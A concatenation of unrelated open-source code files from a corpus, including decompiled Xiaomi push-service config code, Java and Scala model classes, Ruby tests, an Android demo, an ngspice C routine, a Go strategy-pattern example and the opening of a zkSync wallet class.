            BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(j.a().openFileOutput("XMCloudCfg", 0));
            c localc = c.a(localBufferedOutputStream);
            this.c.a(localc);
            localc.a();
            localBufferedOutputStream.close();
        }
        return;
    }
    catch (Exception localException)
    {
        b.a("save config failure: " + localException.getMessage());
    }
}
// Dispatches an incoming config message to all registered listeners; when the
// message carries a newer version than the cached one, re-registers the
// update listener first. Decompiled: the empty `finally {}` is presumably a
// lost synchronized block — TODO confirm.
void a(b.b paramb)
{
    if ((paramb.i()) && (paramb.h() > c())) {
        g();
    }
    try
    {
        a[] arrayOfa = (a[])this.b.toArray(new a[this.b.size()]);
        int j = arrayOfa.length;
        int i = 0;
        while (i < j)
        {
            arrayOfa[i].a(paramb);
            i += 1;
        }
        return;
    }
    finally {}
}
// Registers a listener. Decompiled artifact: `parama = finally;` is invalid
// Java emitted by the decompiler for a synchronized block's handler.
public void a(a parama)
{
    try
    {
        this.b.add(parama);
        return;
    }
    finally
    {
        parama = finally;
        throw parama;
    }
}

// Removes all listeners (same decompiler artifact as above).
void b()
{
    try
    {
        this.b.clear();
        return;
    }
    finally
    {
        localObject = finally;
        throw ((Throwable)localObject);
    }
}
// Returns the cached config's version (c.d()) after lazy-loading, or 0.
int c()
{
    f();
    if (this.c != null) {
        return this.c.d();
    }
    return 0;
}

// Returns the lazily-loaded cached config (null only if loading failed).
public a.a d()
{
    f();
    return this.c;
}
// Listener base class: override to receive config objects (a.a) and
// config messages (b.b); defaults are no-ops.
public static abstract class a
{
    public void a(a.a parama) {}
    public void a(b.b paramb) {}
}
}
/* Location: /Users/gaoht/Downloads/zirom/classes2-dex2jar.jar!/com/xiaomi/push/service/at.class
* Java compiler version: 6 (50.0)
* JD-Core Version: 0.7.1
*/
|
trumank/DRG-Mods
|
Source/FSD/Public/SaveGameStatePerkItem.h
|
<filename>Source/FSD/Public/SaveGameStatePerkItem.h
#pragma once
#include "CoreMinimal.h"
#include "SaveGameStatePerkItem.generated.h"
class UPerkAsset;
// Save-game entry pairing a perk asset with a stored rank value.
USTRUCT(BlueprintType)
struct FSaveGameStatePerkItem {
    GENERATED_BODY()
public:
    // Stored rank for the perk (base index not determinable from here).
    UPROPERTY(EditAnywhere, Transient)
    uint8 Rank;

    // The perk this entry refers to.
    UPROPERTY(BlueprintReadWrite, EditAnywhere, Transient, meta=(AllowPrivateAccess=true))
    UPerkAsset* Perk;

    FSD_API FSaveGameStatePerkItem();
};
|
urirosenberg/cloudera-manager-api
|
src/main/java/com/axemblr/service/cm/models/hosts/MetricList.java
|
/*
* Copyright S.C. Axemblr Software Solutions S.R.L. (c) 2012.
*
* This file is subject to the terms and conditions defined in file
* 'LICENSE.txt', which is part of this source code package.
*/
package com.axemblr.service.cm.models.hosts;
import com.google.common.collect.ImmutableList;
import org.codehaus.jackson.annotate.JsonCreator;
import org.codehaus.jackson.annotate.JsonProperty;
import java.util.List;
/**
* A list of Metric objects.
* <br/>
* http://cloudera.github.com/cm_api/apidocs/v1/el_ns0_metricList.html
* http://cloudera.github.com/cm_api/apidocs/v1/ns0_apiMetricList.html
*/
/**
 * A list of Metric objects.
 * <br/>
 * http://cloudera.github.com/cm_api/apidocs/v1/el_ns0_metricList.html
 * http://cloudera.github.com/cm_api/apidocs/v1/ns0_apiMetricList.html
 */
public class MetricList {
    // Never null: the constructor substitutes an empty list, so the former
    // null checks in equals/hashCode were dead code and have been removed.
    private final ImmutableList<Metric> items;

    /**
     * Builds the list from the JSON {@code items} array.
     *
     * @param items the metrics; {@code null} is treated as empty
     */
    @JsonCreator
    public MetricList(@JsonProperty("items") List<Metric> items) {
        this.items = (items == null) ? ImmutableList.<Metric>of() : ImmutableList.copyOf(items);
    }

    /** @return the immutable list of metrics (possibly empty, never null) */
    public ImmutableList<Metric> getItems() {
        return items;
    }

    @Override
    public boolean equals(Object o) {
        if (this == o) return true;
        if (!(o instanceof MetricList)) return false;
        return items.equals(((MetricList) o).items);
    }

    @Override
    public int hashCode() {
        return items.hashCode();
    }

    @Override
    public String toString() {
        return "MetricList{" +
                "items=" + items +
                '}';
    }
}
|
bannama/gslb
|
src/main/java/com/oneops/gslb/mtd/v2/domain/CreateMtdBaseRequest.java
|
<gh_stars>0
package com.oneops.gslb.mtd.v2.domain;
import com.google.auto.value.AutoValue;
import com.google.gson.Gson;
import com.google.gson.TypeAdapter;
import com.google.gson.annotations.SerializedName;
/**
 * Request payload wrapping an {@link MtdBaseRequest} under the JSON key
 * {@code mtd_base}. Implementation is generated by AutoValue.
 */
@AutoValue
public abstract class CreateMtdBaseRequest {
    /** The wrapped base definition, serialized as {@code mtd_base}. */
    @SerializedName("mtd_base")
    public abstract MtdBaseRequest mtdBase();

    /** Static factory delegating to the AutoValue-generated implementation. */
    public static CreateMtdBaseRequest create(MtdBaseRequest mtdBase) {
        return new AutoValue_CreateMtdBaseRequest(mtdBase);
    }

    /** Gson adapter hook used by the AutoValue-Gson extension. */
    public static TypeAdapter<CreateMtdBaseRequest> typeAdapter(Gson gson) {
        return new AutoValue_CreateMtdBaseRequest.GsonTypeAdapter(gson);
    }
}
|
jaronheard/civic
|
packages/2018/src/assets/electionData.js
|
// Relative importance scores for election-outcome predictor categories,
// with an explicit sortOrder used for display ordering.
// NOTE(review): sortOrder is not monotonic with importance (e.g. "Democrat"
// has lower importance than "St. Senator" yet a higher sortOrder) — confirm
// the ordering is intentional before relying on either field.
const electionData = [
{
category: "Influencers",
importance: 0.532761433,
sortOrder: 11
},
{
category: "$ Expenditures",
importance: 0.2577329977621656,
sortOrder: 10
},
{
category: "$ Received",
importance: 0.22949919907509095,
sortOrder: 9
},
{
category: "Primary Vote Count",
importance: 0.22878431536282723,
sortOrder: 8
},
{
category: "Grassroots",
importance: 0.12021850170825318,
sortOrder: 7
},
{
category: "Republican",
importance: 0.05830959262159894,
sortOrder: 6
},
{
category: "Democrat",
importance: 0.019450051372393994,
sortOrder: 5
},
{
category: "St. Senator",
importance: 0.03578981589773275,
sortOrder: 4
},
{
category: "St. Representative",
importance: 0.033471046408828774,
sortOrder: 3
},
{
category: "Governor",
importance: 0.012904292200920951,
sortOrder: 2
},
{
category: "Attorney General",
importance: 0.00384018759018759,
sortOrder: 1
}
];
export default electionData;
|
williamschey/redmine_dmsf
|
test/functional/my_controller_test.rb
|
<reponame>williamschey/redmine_dmsf
# Redmine plugin for Document Management System "Features"
#
# Copyright (C) 2013 <NAME> <<EMAIL>>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
require File.expand_path('../../test_helper', __FILE__)

# Functional tests for the DMSF blocks that can be placed on "My page".
class MyControllerTest < RedmineDmsf::Test::TestCase
  include Redmine::I18n

  fixtures :users, :user_preferences

  def setup
    @request.session[:user_id] = 2
  end

  def test_page_with_open_approvals_block
    show_block_on_my_page 'open_approvals'
    get :page
    assert_response :success
    assert_select 'h3', :text => "#{l(:label_my_open_approvals)} (2)"
  end

  def test_page_with_open_locked_documents
    show_block_on_my_page 'locked_documents'
    get :page
    assert_response :success
    assert_select 'h3', :text => "#{l(:label_my_locked_documents)} (0/1)"
  end

  private

  # Persists a "my page" layout for user 2 containing only the given block
  # in the top zone.
  def show_block_on_my_page(block_name)
    prefs = User.find(2).pref
    prefs[:my_page_layout] = {'top' => [block_name]}
    prefs.save!
  end
end
|
Raffy23/boinc-webmanager
|
shared/src/main/scala/at/happywetter/boinc/shared/websocket/package.scala
|
package at.happywetter.boinc.shared
import upickle.default.macroRW
/**
* Created by:
*
* @author Raphael
* @version 16.07.2019
*/
package object websocket {

/** Base type for every message exchanged over the web socket. */
sealed trait WebSocketMessage

/** Client request: start receiving group-change notifications. */
object SubscribeToGroupChanges extends WebSocketMessage

/** Client request: stop receiving group-change notifications. */
object UnsubscribeToGroupChanges extends WebSocketMessage

/** Server push: the host list and/or group membership changed. */
case class HostInformationChanged(hosts: Seq[String], groups: Map[String, List[String]]) extends WebSocketMessage

/** Positive acknowledgement of a request. */
object ACK extends WebSocketMessage

/** Negative acknowledgement of a request. */
object NACK extends WebSocketMessage

// upickle (de)serializers for the message hierarchy.
implicit val hostInformationChangedParser = macroRW[HostInformationChanged]
implicit val webSocketMessageParser = macroRW[WebSocketMessage]
}
|
Hardy-Space/SomeASDemo
|
tablayout_viewpager/src/main/java/com/hardy/person/tablayout_viewpager/MainActivity.java
|
<reponame>Hardy-Space/SomeASDemo
package com.hardy.person.tablayout_viewpager;
import android.graphics.Color;
import android.os.Bundle;
import android.support.design.widget.TabLayout;
import android.support.v4.view.PagerAdapter;
import android.support.v4.view.ViewPager;
import android.support.v7.app.AppCompatActivity;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import java.util.ArrayList;
import java.util.List;
public class MainActivity extends AppCompatActivity implements View.OnClickListener {

    // Tab strip that mirrors the pager's pages.
    private TabLayout mTab;
    // Pager hosting one content view per tab.
    private ViewPager mPager;
    // Page titles shown in the TabLayout.
    private List<String> titles = new ArrayList<>();
    // Page content views, one per tab.
    private List<View> views = new ArrayList<>();
    // The individual page views.
    View view1, view2, view3, view4, view5, view6;
    // Inflater used to build the page views.
    private LayoutInflater mLayoutInflater;
    // Bottom bar items; exactly one is marked selected at a time.
    private TextView mAdvice;
    private TextView mRank;
    private TextView mFind;
    private TextView mMine;

    /** Looks up all views from the layout and inflates the six pager pages. */
    private void assignViews() {
        mTab = (TabLayout) findViewById(R.id.tab);
        mPager = (ViewPager) findViewById(R.id.pager);
        mAdvice = (TextView) findViewById(R.id.advice);
        mRank = (TextView) findViewById(R.id.rank);
        mFind = (TextView) findViewById(R.id.find);
        mMine = (TextView) findViewById(R.id.mine);

        mLayoutInflater = getLayoutInflater();
        view1 = mLayoutInflater.inflate(R.layout.viewpager_content, null);
        view2 = mLayoutInflater.inflate(R.layout.viewpager_content, null);
        view3 = mLayoutInflater.inflate(R.layout.viewpager_content, null);
        view4 = mLayoutInflater.inflate(R.layout.viewpager_content, null);
        view5 = mLayoutInflater.inflate(R.layout.viewpager_content, null);
        view6 = mLayoutInflater.inflate(R.layout.viewpager_content, null);
        views.add(view1);
        views.add(view2);
        views.add(view3);
        views.add(view4);
        views.add(view5);
        views.add(view6);
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        assignViews();

        // Page titles "No.1" .. "No.6".
        for (int i = 1; i <= 6; i++) {
            titles.add("No." + i);
        }

        // Scrollable mode keeps many tabs usable; fixed modes would squeeze
        // them all onto the screen.
        mTab.setTabMode(TabLayout.MODE_SCROLLABLE);
        // Color of the selection indicator under the tab text.
        mTab.setSelectedTabIndicatorColor(Color.BLUE);
        mTab.setBackgroundColor(Color.BLACK);
        // First argument: unselected text color; second: selected text color.
        mTab.setTabTextColors(Color.WHITE, Color.RED);

        // One tab per title.
        for (String title : titles) {
            mTab.addTab(mTab.newTab().setText(title));
        }

        mPager.setAdapter(new MyViewpagerAdapter(views));
        // Keep TabLayout and ViewPager in sync.
        mTab.setupWithViewPager(mPager);

        mAdvice.setOnClickListener(this);
        mRank.setOnClickListener(this);
        mFind.setOnClickListener(this);
        mMine.setOnClickListener(this);
    }

    @Override
    public void onClick(View v) {
        switch (v.getId()) {
            case R.id.advice:
                highlightOnly(mAdvice);
                break;
            case R.id.rank:
                highlightOnly(mRank);
                break;
            case R.id.find:
                highlightOnly(mFind);
                break;
            case R.id.mine:
                highlightOnly(mMine);
                break;
        }
    }

    /** Marks exactly the given bottom-bar item as selected, clearing the rest. */
    private void highlightOnly(TextView selected) {
        mAdvice.setSelected(selected == mAdvice);
        mRank.setSelected(selected == mRank);
        mFind.setSelected(selected == mFind);
        mMine.setSelected(selected == mMine);
    }

    class MyViewpagerAdapter extends PagerAdapter {

        private List<View> list;

        public MyViewpagerAdapter(List<View> list) {
            this.list = list;
        }

        @Override
        public int getCount() {
            return list.size();
        }

        @Override
        public boolean isViewFromObject(View view, Object object) {
            // Recommended identity check for view-based adapters.
            return view == object;
        }

        @Override
        public Object instantiateItem(ViewGroup container, int position) {
            // Bug fix: use the adapter's own list instead of reaching into the
            // activity's `views` field, so the adapter honors whatever list it
            // was constructed with.
            View page = list.get(position);
            container.addView(page);
            return page;
        }

        @Override
        public void destroyItem(ViewGroup container, int position, Object object) {
            // Same fix as instantiateItem: remove from the adapter's own list.
            container.removeView(list.get(position));
        }

        @Override
        public CharSequence getPageTitle(int position) {
            // NOTE(review): titles still comes from the enclosing activity;
            // assumes titles.size() >= list.size() — confirm if the adapter is
            // ever reused with a different list.
            return titles.get(position);
        }
    }
}
|
zhulcher/larcv3
|
tests/larcv/core/dataformat/test_write_image2d.py
|
<gh_stars>1-10
# import pytest
# import unittest
# import larcv
# from larcv import data_generator
# from random import Random
# random = Random()
# #
# # For backward compatibility, otherwise see test_write_tensor.py
# #
# @pytest.fixture()
# def rand_num_events():
# return random.randint(1, 5)
# # def write_image2d(tempfile, event_image_list):
# # io_manager = larcv.IOManager(larcv.IOManager.kWRITE)
# # io_manager.set_out_file(tempfile)
# # io_manager.initialize()
# # for event in range(len(event_image_list)):
# # io_manager.set_id(1001, 0, event)
# # images = event_image_list[event]
# # # Get a piece of data, image2d:
# # ev_image2d = larcv.EventImage2D.to_image2d(io_manager.get_data("image2d","test"))
# # for projection in range(len(images)):
# # image2d = larcv.as_image2d(images[projection])
# # ev_image2d.append(image2d)
# # io_manager.save_entry()
# # print("Finished event loop")
# # # assert(io_manager.get_n_entries_out() == rand_num_events)
# # io_manager.finalize()
# # return
# # def read_image2d(tempfile):
# # from copy import copy
# # io_manager = larcv.IOManager(larcv.IOManager.kREAD)
# # io_manager.add_in_file(tempfile)
# # io_manager.initialize()
# # event_image_list = []
# # for i in range(io_manager.get_n_entries()):
# # event_image_list.append([])
# # io_manager.read_entry(i)
# # # Get a piece of data, sparse tensor:
# # ev_image2d = larcv.EventImage2D.to_image2d(io_manager.get_data("image2d","test"))
# # print("Number of images read: ", ev_image2d.as_vector().size())
# # for projection in range(ev_image2d.as_vector().size()):
# # image = larcv.as_ndarray(ev_image2d.as_vector()[projection])
# # event_image_list[i].append(copy(image))
# # return event_image_list
# # def build_image2d(rand_num_events, n_projections):
# # from larcv import larcv
# # import numpy
# # event_image_list = []
# # for i in range(rand_num_events):
# # event_image_list.append([])
# # # Get a piece of data, image2d:
# # for projection in range(n_projections):
# # shape = []
# # for dim in range(2):
# # shape.append(random.randint(1, 1e3))
# # raw_image = numpy.random.random(shape).astype("float32")
# # event_image_list[i].append(raw_image)
# # return event_image_list
# @pytest.mark.parametrize('n_projections', [1,2,3])
# def test_write_image2d(tmpdir, rand_num_events, n_projections):
# event_image_list = data_generator.build_image2d(rand_num_events, n_projections = n_projections)
# random_file_name = str(tmpdir + "/test_write_image2d.h5")
# data_generator.write_image2d(random_file_name, event_image_list)
# @pytest.mark.parametrize('n_projections', [1,2,3])
# def test_write_read_image2d(tmpdir, rand_num_events, n_projections):
# import numpy
# random_file_name = str(tmpdir + "/test_write_read_image2d.h5")
# event_image_list = data_generator.build_image2d(rand_num_events, n_projections = n_projections)
# data_generator.write_image2d(random_file_name, event_image_list)
# read_event_image_list = data_generator.read_image2d(random_file_name)
# # Check the same number of events came back:
# assert(len(read_event_image_list) == rand_num_events)
# for event in range(rand_num_events):
# # Check the same number of projections per event:
# assert(len(read_event_image_list[event]) == len(event_image_list[event]))
# for projection in range(n_projections):
# # Check the same number of voxels:
# input_image = event_image_list[event][projection]
# read_image = read_event_image_list[event][projection]
# assert(numpy.sum(input_image) - numpy.sum(read_image) < 1e-3)
# assert(numpy.sum(numpy.fabs(input_image)) - numpy.sum(numpy.fabs(read_image)) < 1e-3)
# assert(input_image.shape == read_image.shape)
# assert(numpy.mean(input_image - read_image) < 1e-3)
# if __name__ == '__main__':
# tmpdir = "./"
# rand_num_events = 10
# n_projections = 3
# test_write_read_image2d(tmpdir, rand_num_events, n_projections)
|
imh0t3mp/GeekBrains_Java
|
task_rest/src/main/java/name/imh0t3mp/course/geekbrains/task_tracker/repo/TaskRepository.java
|
package name.imh0t3mp.course.geekbrains.task_tracker.repo;
import name.imh0t3mp.course.geekbrains.task_tracker.entity.Task;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.JpaSpecificationExecutor;
import org.springframework.data.repository.PagingAndSortingRepository;
import org.springframework.stereotype.Repository;
import javax.transaction.Transactional;
import java.util.List;
/**
 * Spring Data repository for {@link Task} entities.
 *
 * <p>{@code JpaRepository} already provides paging and sorting, so the former
 * explicit {@code PagingAndSortingRepository} supertype was redundant and has
 * been dropped; the inherited capability is unchanged.
 *
 * <p>NOTE(review): class-level {@code @Transactional} on a repository
 * interface is unusual — Spring Data repository methods are transactional by
 * default; confirm it is still required.
 */
@Repository
@Transactional
public interface TaskRepository extends
        JpaRepository<Task, Integer>,
        JpaSpecificationExecutor<Task> {

    /** Tasks whose owner has the given username. */
    List<Task> findTaskByOwner_Username(String ownerName);

    /** Tasks whose performer has the given username. */
    List<Task> findTaskByPerformer_Username(String performerName);

    /** Tasks currently in the given status. */
    List<Task> findTaskByStatus(String status);
}
|
Surya-98/Snapcuit
|
NGSpice/ngspice-30/src/spicelib/devices/csw/cswmask.c
|
<filename>NGSpice/ngspice-30/src/spicelib/devices/csw/cswmask.c
/**********
Copyright 1990 Regents of the University of California. All rights reserved.
Author: 1987 <NAME>
**********/
/*
* This routine gives access to the internal model parameters
* of Current controlled SWitch
*/
#include "ngspice/ngspice.h"
#include "ngspice/cktdefs.h"
#include "ngspice/devdefs.h"
#include "ngspice/ifsim.h"
#include "cswdefs.h"
#include "ngspice/sperror.h"
#include "ngspice/suffix.h"
/*
 * Read back one internal parameter of a current-controlled switch model.
 *
 * ckt   - circuit context (unused here)
 * inst  - the CSW model instance being queried
 * which - CSW_* parameter identifier
 * value - receives the parameter value
 *
 * Returns OK on success, E_BADPARM for an unknown parameter id.
 */
int
CSWmAsk(CKTcircuit *ckt, GENmodel *inst, int which, IFvalue *value)
{
    CSWmodel *model = (CSWmodel *) inst;

    NG_IGNORE(ckt);

    switch (which) {
    case CSW_RON:
        value->rValue = model->CSWonResistance;
        return OK;
    case CSW_ROFF:
        value->rValue = model->CSWoffResistance;
        return OK;
    case CSW_ITH:
        value->rValue = model->CSWiThreshold;
        return OK;
    case CSW_IHYS:
        value->rValue = model->CSWiHysteresis;
        return OK;
    case CSW_GON:
        value->rValue = model->CSWonConduct;
        return OK;
    case CSW_GOFF:
        value->rValue = model->CSWoffConduct;
        return OK;
    default:
        return E_BADPARM;
    }
}
|
git4wht/cloudbreak
|
orchestrator-salt/src/main/java/com/sequenceiq/cloudbreak/orchestrator/salt/poller/checker/StateRunner.java
|
package com.sequenceiq.cloudbreak.orchestrator.salt.poller.checker;
import java.util.Set;
import com.sequenceiq.cloudbreak.common.orchestration.Node;
import com.sequenceiq.cloudbreak.orchestrator.salt.client.SaltConnector;
import com.sequenceiq.cloudbreak.orchestrator.salt.client.target.HostList;
import com.sequenceiq.cloudbreak.orchestrator.salt.poller.BaseSaltJobRunner;
import com.sequenceiq.cloudbreak.orchestrator.salt.states.SaltStates;
/**
 * Salt job runner that applies a named Salt state on a set of target hosts.
 */
public class StateRunner extends BaseSaltJobRunner {

    //CHECKSTYLE:OFF
    protected final String state;
    //CHECKSTYLE:ON

    /**
     * @param targetHostnames hosts the state should be applied on
     * @param allNode         all known nodes, passed through to the base runner
     * @param state           name of the Salt state to apply
     */
    public StateRunner(Set<String> targetHostnames, Set<Node> allNode, String state) {
        super(targetHostnames, allNode);
        this.state = state;
    }

    /**
     * Applies the configured state on the target hosts.
     *
     * @return the Salt job id of the submitted run
     */
    @Override
    public String submit(SaltConnector saltConnector) throws SaltJobFailedException {
        HostList targets = new HostList(getTargetHostnames());
        return SaltStates.applyState(saltConnector, state, targets).getJid();
    }

    @Override
    public String toString() {
        // Bug fix: the previous literal ended with "}'", leaving a stray
        // apostrophe in every log line.
        return "StateRunner{" + super.toString() + ", state: " + this.state + "}";
    }

    public String getState() {
        return state;
    }
}
|
Sampaguitas/pdb_server
|
routes/doctype/delete.js
|
<gh_stars>1-10
const express = require('express');

const router = express.Router();
const DocType = require('../../models/DocType');

// DELETE /?id=<docTypeId> — removes a single DocType document by id.
router.delete('/', (req, res) => {
    const { id } = req.query;
    DocType.findByIdAndDelete(id, (err, doctype) => {
        if (err) {
            // NOTE(review): a database failure is reported as 400; 500 may be
            // more accurate — confirm the API contract before changing.
            return res.status(400).json({ message: 'An error has occured' });
        }
        if (!doctype) {
            return res.status(400).json({ message: 'Could not find DocType.' });
        }
        return res.status(200).json({ message: 'DocType has successfully been deleted.' });
    });
});

module.exports = router;
|
Gitman1989/chromium
|
chrome/browser/views/extensions/browser_action_overflow_menu_controller.h
|
// Copyright (c) 2010 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_VIEWS_EXTENSIONS_BROWSER_ACTION_OVERFLOW_MENU_CONTROLLER_H_
#define CHROME_BROWSER_VIEWS_EXTENSIONS_BROWSER_ACTION_OVERFLOW_MENU_CONTROLLER_H_
#pragma once
#include "chrome/browser/ui/views/extensions/browser_action_overflow_menu_controller.h"
// TODO(beng): remove this file once all includes have been updated.
#endif // CHROME_BROWSER_VIEWS_EXTENSIONS_BROWSER_ACTION_OVERFLOW_MENU_CONTROLLER_H_
|
lechium/tvOS145Headers
|
System/Library/PrivateFrameworks/AppleMediaServices.framework/AMSFraudScoreService.h
|
/*
* This header is generated by classdump-dyld 1.5
* on Wednesday, April 28, 2021 at 9:10:56 PM Mountain Standard Time
* Operating System: Version 14.5 (Build 18L204)
* Image Source: /System/Library/PrivateFrameworks/AppleMediaServices.framework/AppleMediaServices
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by <NAME>. Updated by <NAME>.
*/
// Class-dumped private-framework header: only selectors are visible, no
// implementation. All semantics below are inferred from names — verify
// against the framework binary before relying on them.
@interface AMSFraudScoreService : NSObject
// Presumably caches a fraud score keyed by purchase info — TODO confirm.
+(id)cacheFraudScore:(id)arg1 forPurchaseInfo:(id)arg2 ;
// Presumably returns a previously cached score, or nil — TODO confirm.
+(id)cachedFraudScoreForPurchaseInfo:(id)arg1 ;
// Presumably computes a fresh score for the given action/account — TODO confirm.
+(id)generateFraudScoreForAction:(unsigned long long)arg1 account:(id)arg2 logKey:(id)arg3 ;
@end
|
Danny5487401/go_advanced_code
|
chapter09_design_pattern/03_motion/06_strategyMethod/01_example1/main.go
|
package main

import "fmt"

// Strategy pattern example.
//
// Strategy suits code where an if/else chain selects between interchangeable
// behaviours that may grow over time; it does not pay off when the set of
// cases is fixed (e.g. the seven days of a week). Strategy and its
// implementations give a component a family of reusable algorithms that can
// be swapped at runtime.

// The naive approach:
/*
type API struct {
}

// This branch list is unstable and not extensible: every new vendor requires
// editing this method.
func (a *API) Recognition(name string) {
	if name == "ali" {
		fmt.Println("ali api调用")
	} else if name == "baidu" {
		fmt.Println("baidu api调用")
	} else if name == "xunfei" {
		fmt.Println("xunfei api调用")
	}
	// ...add further vendors here
}
*/

// ==================== Strategy-pattern version =====================

// ============== stable part ===============

// IAPI is the strategy interface: every vendor implements Recognition().
type IAPI interface {
	Recognition()
}

// API holds the currently selected strategy.
type API struct {
	// Composition rather than inheritance: the concrete strategy is held as
	// a field and can be replaced at runtime.
	iapi IAPI
}

// OnProgress runs the currently selected strategy. It previously duplicated
// GetRecognition's body; it now delegates to keep the two in sync.
func (a *API) OnProgress() {
	a.GetRecognition()
}

// SetRecognition selects a strategy by vendor name.
// NOTE(review): an unknown name leaves a.iapi unchanged (possibly nil), and a
// later Recognition() call would then panic — confirm callers only pass
// known names.
func (a *API) SetRecognition(t string) {
	switch t {
	case "ali":
		a.iapi = new(Ali)
	case "baidu":
		a.iapi = new(Bai)
	}
}

// GetRecognition invokes the selected strategy.
func (a *API) GetRecognition() {
	a.iapi.Recognition()
}

// ============== variable, extensible part ==================

// Ali is the Alibaba strategy.
type Ali struct {
}

// Recognition implements IAPI for Ali.
func (a *Ali) Recognition() {
	fmt.Println("ali api 调用")
}

// Bai is the Baidu strategy.
type Bai struct {
}

// Recognition implements IAPI for Bai.
func (b *Bai) Recognition() {
	fmt.Println("baidu api 调用")
}

func main() {
	// A factory would remove the remaining switch entirely; this example
	// keeps a pure Strategy for clarity.
	api := new(API)

	// Use Alibaba.
	api.SetRecognition("ali")
	api.GetRecognition()

	// Use Baidu.
	api.SetRecognition("baidu")
	api.GetRecognition()
}
|
github-allen/keystone
|
src/main/scala/keystoneml/nodes/images/RandomImageTransformer.scala
|
<reponame>github-allen/keystone<filename>src/main/scala/keystoneml/nodes/images/RandomImageTransformer.scala
package keystoneml.nodes.images
import org.apache.spark.rdd.RDD
import keystoneml.utils.{ImageUtils, Image}
import keystoneml.workflow.Transformer
/**
* Transform an image with the given probability
*
* @param chance probability that an image should be transformed
* @param transform function to apply to image
* @return transformed image or original image
*/
case class RandomImageTransformer(
  chance: Double,
  transform: Image => Image,
  seed: Long = 12334L) extends Transformer[Image, Image] {

  // NOTE(review): java.util.Random is not thread-safe under contention, and
  // after case-class serialization every executor copy restarts from the same
  // seed, so tasks may draw identical sequences — confirm this is acceptable
  // for the intended randomization.
  val rnd = new java.util.Random(seed)

  def apply(im: Image): Image = {
    val flip = rnd.nextDouble()
    // Apply the transform with probability `chance`, otherwise pass the
    // image through unchanged.
    if (flip < chance) {
      transform(im)
    } else {
      im
    }
  }
}
|
zksync-sdk/zksync-java
|
src/main/java/io/zksync/wallet/DefaultZkSyncWallet.java
|
package io.zksync.wallet;
import io.reactivex.annotations.Nullable;
import io.zksync.domain.TimeRange;
import io.zksync.domain.auth.ChangePubKeyOnchain;
import io.zksync.domain.auth.ChangePubKeyVariant;
import io.zksync.domain.auth.Toggle2FA;
import io.zksync.domain.fee.TransactionFee;
import io.zksync.domain.state.AccountState;
import io.zksync.domain.swap.Order;
import io.zksync.domain.token.NFT;
import io.zksync.domain.token.Token;
import io.zksync.domain.token.TokenId;
import io.zksync.domain.token.Tokens;
import io.zksync.domain.transaction.*;
import io.zksync.ethereum.DefaultEthereumProvider;
import io.zksync.ethereum.EthereumProvider;
import io.zksync.ethereum.wrappers.ZkSync;
import io.zksync.exception.ZkSyncException;
import io.zksync.provider.DefaultProvider;
import io.zksync.provider.Provider;
import io.zksync.signer.EthSignature;
import io.zksync.signer.EthSigner;
import io.zksync.signer.ZkSigner;
import io.zksync.transport.ZkSyncTransport;
import lombok.Getter;
import lombok.SneakyThrows;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.stream.Collectors;
import org.apache.commons.lang3.tuple.Pair;
import org.web3j.protocol.Web3j;
import org.web3j.tuples.generated.Tuple2;
import org.web3j.tx.gas.ContractGasProvider;
import org.web3j.utils.Strings;
public class DefaultZkSyncWallet<A extends ChangePubKeyVariant, S extends EthSigner<A>> implements ZkSyncWallet {
// Signs Ethereum-side messages and supplies the wallet's L1 address.
private S ethSigner;
// Produces zkSync (L2) signatures for transactions.
private ZkSigner zkSigner;
@Getter
private Provider provider;
// Cached account id; populated lazily by loadAccountInfo() on first access.
private Integer accountId;
// Cached pubkey hash registered on the account; lazily populated as well.
private String pubKeyHash;
// Package-private: callers should use the static build(...) factories.
DefaultZkSyncWallet(S ethSigner, ZkSigner zkSigner, Provider provider) {
this.ethSigner = ethSigner;
this.zkSigner = zkSigner;
this.provider = provider;
this.accountId = null;
this.pubKeyHash = null;
}
// Factory that wires a DefaultProvider around the given transport.
public static <A extends ChangePubKeyVariant, S extends EthSigner<A>> DefaultZkSyncWallet<A, S> build(S ethSigner, ZkSigner zkSigner, ZkSyncTransport transport) {
return new DefaultZkSyncWallet<>(ethSigner, zkSigner, new DefaultProvider(transport));
}
// Factory using an externally constructed provider.
public static <A extends ChangePubKeyVariant, S extends EthSigner<A>> DefaultZkSyncWallet<A, S> build(S ethSigner, ZkSigner zkSigner, Provider provider) {
return new DefaultZkSyncWallet<>(ethSigner, zkSigner, provider);
}
// Registers this wallet's ZkSigner public key hash as the account's signing
// key, authorized either on-chain or via an Ethereum-signed message.
// A null nonce means "use the wallet's current nonce". Throws
// ZkSyncException when the ZkSigner's key is already the account's key.
// In both branches the transaction is submitted without a separate
// Ethereum signature (null) and without fast processing (false).
@Override
public String setSigningKey(TransactionFee fee, Integer nonce, boolean onchainAuth, TimeRange timeRange) {
if (isSigningKeySet()) {
throw new ZkSyncException("Current signing key is already set");
}
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
if (onchainAuth) {
final SignedTransaction<ChangePubKey<ChangePubKeyOnchain>> signedTx = buildSignedChangePubKeyTxOnchain(fee, nonceToUse, timeRange);
return submitSignedTransaction(signedTx.getTransaction(), null, false);
} else {
final SignedTransaction<ChangePubKey<A>> signedTx = buildSignedChangePubKeyTx(fee, nonceToUse, timeRange);
return submitSignedTransaction(signedTx.getTransaction(), null, false);
}
}
// Transfers `amount` of the fee token to address `to`. For every sync*
// method below, a null nonce means "use the wallet's current nonce".
@Override
public String syncTransfer(String to, BigInteger amount, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
